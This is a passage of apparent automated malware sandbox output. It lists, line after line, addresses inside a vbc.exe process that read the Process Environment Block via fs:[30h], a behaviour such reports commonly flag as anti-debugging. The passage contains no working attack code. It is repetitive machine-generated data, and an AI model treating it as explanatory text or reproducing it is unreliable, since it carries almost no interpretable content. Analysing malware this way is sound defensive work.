                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922000 mov eax, dword ptr fs:[00000030h]6_2_05922000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E016 mov eax, dword ptr fs:[00000030h]6_2_0589E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E016 mov eax, dword ptr fs:[00000030h]6_2_0589E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E016 mov eax, dword ptr fs:[00000030h]6_2_0589E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E016 mov eax, dword ptr fs:[00000030h]6_2_0589E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05916030 mov eax, dword ptr fs:[00000030h]6_2_05916030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A020 mov eax, dword ptr fs:[00000030h]6_2_0587A020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C020 mov eax, dword ptr fs:[00000030h]6_2_0587C020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05906050 mov eax, dword ptr fs:[00000030h]6_2_05906050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882050 mov eax, dword ptr fs:[00000030h]6_2_05882050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AC073 mov eax, dword ptr fs:[00000030h]6_2_058AC073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A438F mov eax, dword ptr fs:[00000030h]6_2_058A438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A438F mov eax, dword ptr fs:[00000030h]6_2_058A438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E388 mov eax, dword ptr fs:[00000030h]6_2_0587E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E388 mov eax, dword ptr fs:[00000030h]6_2_0587E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587E388 mov eax, dword ptr fs:[00000030h]6_2_0587E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05878397 mov eax, dword ptr fs:[00000030h]6_2_05878397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05878397 mov eax, dword ptr fs:[00000030h]6_2_05878397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05878397 mov eax, dword ptr fs:[00000030h]6_2_05878397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059243D4 mov eax, dword ptr fs:[00000030h]6_2_059243D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059243D4 mov eax, dword ptr fs:[00000030h]6_2_059243D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A3C0 mov eax, dword ptr fs:[00000030h]6_2_0588A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A3C0 mov eax, dword ptr fs:[00000030h]6_2_0588A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A3C0 mov eax, dword ptr fs:[00000030h]6_2_0588A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A3C0 mov eax, dword ptr fs:[00000030h]6_2_0588A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A3C0 mov eax, dword ptr fs:[00000030h]6_2_0588A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A3C0 mov eax, dword ptr fs:[00000030h]6_2_0588A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058883C0 mov eax, dword ptr fs:[00000030h]6_2_058883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058883C0 mov eax, dword ptr fs:[00000030h]6_2_058883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058883C0 mov eax, dword ptr fs:[00000030h]6_2_058883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058883C0 mov eax, dword ptr fs:[00000030h]6_2_058883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E3DB mov eax, dword ptr fs:[00000030h]6_2_0592E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E3DB mov eax, dword ptr fs:[00000030h]6_2_0592E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E3DB mov ecx, dword ptr fs:[00000030h]6_2_0592E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592E3DB mov eax, dword ptr fs:[00000030h]6_2_0592E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059063C0 mov eax, dword ptr fs:[00000030h]6_2_059063C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593C3CD mov eax, dword ptr fs:[00000030h]6_2_0593C3CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058903E9 mov eax, dword ptr fs:[00000030h]6_2_058903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058903E9 mov eax, dword ptr fs:[00000030h]6_2_058903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058903E9 mov eax, dword ptr fs:[00000030h]6_2_058903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058903E9 mov eax, dword ptr fs:[00000030h]6_2_058903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058903E9 mov eax, dword ptr fs:[00000030h]6_2_058903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058903E9 mov eax, dword ptr fs:[00000030h]6_2_058903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058903E9 mov eax, dword ptr fs:[00000030h]6_2_058903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058903E9 mov eax, dword ptr fs:[00000030h]6_2_058903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B63FF mov eax, dword ptr fs:[00000030h]6_2_058B63FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E3F0 mov eax, dword ptr fs:[00000030h]6_2_0589E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E3F0 mov eax, dword ptr fs:[00000030h]6_2_0589E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589E3F0 mov eax, dword ptr fs:[00000030h]6_2_0589E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA30B mov eax, dword ptr fs:[00000030h]6_2_058BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA30B mov eax, dword ptr fs:[00000030h]6_2_058BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BA30B mov eax, dword ptr fs:[00000030h]6_2_058BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587C310 mov ecx, dword ptr fs:[00000030h]6_2_0587C310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A0310 mov ecx, dword ptr fs:[00000030h]6_2_058A0310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05928350 mov ecx, dword ptr fs:[00000030h]6_2_05928350
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0594A352 mov eax, dword ptr fs:[00000030h]6_2_0594A352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590035C mov eax, dword ptr fs:[00000030h]6_2_0590035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590035C mov eax, dword ptr fs:[00000030h]6_2_0590035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590035C mov eax, dword ptr fs:[00000030h]6_2_0590035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590035C mov ecx, dword ptr fs:[00000030h]6_2_0590035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590035C mov eax, dword ptr fs:[00000030h]6_2_0590035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590035C mov eax, dword ptr fs:[00000030h]6_2_0590035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05902349 mov eax, dword ptr fs:[00000030h]6_2_05902349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0592437C mov eax, dword ptr fs:[00000030h]6_2_0592437C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE284 mov eax, dword ptr fs:[00000030h]6_2_058BE284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BE284 mov eax, dword ptr fs:[00000030h]6_2_058BE284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05900283 mov eax, dword ptr fs:[00000030h]6_2_05900283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05900283 mov eax, dword ptr fs:[00000030h]6_2_05900283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05900283 mov eax, dword ptr fs:[00000030h]6_2_05900283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058902A0 mov eax, dword ptr fs:[00000030h]6_2_058902A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058902A0 mov eax, dword ptr fs:[00000030h]6_2_058902A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059162A0 mov eax, dword ptr fs:[00000030h]6_2_059162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059162A0 mov ecx, dword ptr fs:[00000030h]6_2_059162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059162A0 mov eax, dword ptr fs:[00000030h]6_2_059162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059162A0 mov eax, dword ptr fs:[00000030h]6_2_059162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059162A0 mov eax, dword ptr fs:[00000030h]6_2_059162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_059162A0 mov eax, dword ptr fs:[00000030h]6_2_059162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A2C3 mov eax, dword ptr fs:[00000030h]6_2_0588A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A2C3 mov eax, dword ptr fs:[00000030h]6_2_0588A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A2C3 mov eax, dword ptr fs:[00000030h]6_2_0588A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A2C3 mov eax, dword ptr fs:[00000030h]6_2_0588A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588A2C3 mov eax, dword ptr fs:[00000030h]6_2_0588A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058902E1 mov eax, dword ptr fs:[00000030h]6_2_058902E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058902E1 mov eax, dword ptr fs:[00000030h]6_2_058902E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058902E1 mov eax, dword ptr fs:[00000030h]6_2_058902E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587823B mov eax, dword ptr fs:[00000030h]6_2_0587823B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593A250 mov eax, dword ptr fs:[00000030h]6_2_0593A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0593A250 mov eax, dword ptr fs:[00000030h]6_2_0593A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886259 mov eax, dword ptr fs:[00000030h]6_2_05886259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05908243 mov eax, dword ptr fs:[00000030h]6_2_05908243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05908243 mov ecx, dword ptr fs:[00000030h]6_2_05908243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587A250 mov eax, dword ptr fs:[00000030h]6_2_0587A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930274 mov eax, dword ptr fs:[00000030h]6_2_05930274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05884260 mov eax, dword ptr fs:[00000030h]6_2_05884260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05884260 mov eax, dword ptr fs:[00000030h]6_2_05884260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05884260 mov eax, dword ptr fs:[00000030h]6_2_05884260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587826B mov eax, dword ptr fs:[00000030h]6_2_0587826B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B6DA0 mov eax, dword ptr fs:[00000030h]6_2_058B6DA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A8DBF mov eax, dword ptr fs:[00000030h]6_2_058A8DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A8DBF mov eax, dword ptr fs:[00000030h]6_2_058A8DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954DAD mov eax, dword ptr fs:[00000030h]6_2_05954DAD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05948DAE mov eax, dword ptr fs:[00000030h]6_2_05948DAE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05948DAE mov eax, dword ptr fs:[00000030h]6_2_05948DAE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BCDB1 mov ecx, dword ptr fs:[00000030h]6_2_058BCDB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BCDB1 mov eax, dword ptr fs:[00000030h]6_2_058BCDB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BCDB1 mov eax, dword ptr fs:[00000030h]6_2_058BCDB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904DD7 mov eax, dword ptr fs:[00000030h]6_2_05904DD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904DD7 mov eax, dword ptr fs:[00000030h]6_2_05904DD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AEDD3 mov eax, dword ptr fs:[00000030h]6_2_058AEDD3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AEDD3 mov eax, dword ptr fs:[00000030h]6_2_058AEDD3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05920DF0 mov eax, dword ptr fs:[00000030h]6_2_05920DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05920DF0 mov eax, dword ptr fs:[00000030h]6_2_05920DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588ADE0 mov eax, dword ptr fs:[00000030h]6_2_0588ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588ADE0 mov eax, dword ptr fs:[00000030h]6_2_0588ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588ADE0 mov eax, dword ptr fs:[00000030h]6_2_0588ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588ADE0 mov eax, dword ptr fs:[00000030h]6_2_0588ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588ADE0 mov eax, dword ptr fs:[00000030h]6_2_0588ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588ADE0 mov eax, dword ptr fs:[00000030h]6_2_0588ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A0DE1 mov eax, dword ptr fs:[00000030h]6_2_058A0DE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CDEA mov eax, dword ptr fs:[00000030h]6_2_0587CDEA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CDEA mov eax, dword ptr fs:[00000030h]6_2_0587CDEA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05876DF6 mov eax, dword ptr fs:[00000030h]6_2_05876DF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058ACDF0 mov eax, dword ptr fs:[00000030h]6_2_058ACDF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058ACDF0 mov ecx, dword ptr fs:[00000030h]6_2_058ACDF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05938D10 mov eax, dword ptr fs:[00000030h]6_2_05938D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05938D10 mov eax, dword ptr fs:[00000030h]6_2_05938D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589AD00 mov eax, dword ptr fs:[00000030h]6_2_0589AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589AD00 mov eax, dword ptr fs:[00000030h]6_2_0589AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589AD00 mov eax, dword ptr fs:[00000030h]6_2_0589AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B4D1D mov eax, dword ptr fs:[00000030h]6_2_058B4D1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05876D10 mov eax, dword ptr fs:[00000030h]6_2_05876D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05876D10 mov eax, dword ptr fs:[00000030h]6_2_05876D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05876D10 mov eax, dword ptr fs:[00000030h]6_2_05876D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05908D20 mov eax, dword ptr fs:[00000030h]6_2_05908D20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05880D59 mov eax, dword ptr fs:[00000030h]6_2_05880D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05880D59 mov eax, dword ptr fs:[00000030h]6_2_05880D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05880D59 mov eax, dword ptr fs:[00000030h]6_2_05880D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888D59 mov eax, dword ptr fs:[00000030h]6_2_05888D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888D59 mov eax, dword ptr fs:[00000030h]6_2_05888D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888D59 mov eax, dword ptr fs:[00000030h]6_2_05888D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888D59 mov eax, dword ptr fs:[00000030h]6_2_05888D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05888D59 mov eax, dword ptr fs:[00000030h]6_2_05888D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05918D6B mov eax, dword ptr fs:[00000030h]6_2_05918D6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05878C8D mov eax, dword ptr fs:[00000030h]6_2_05878C8D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
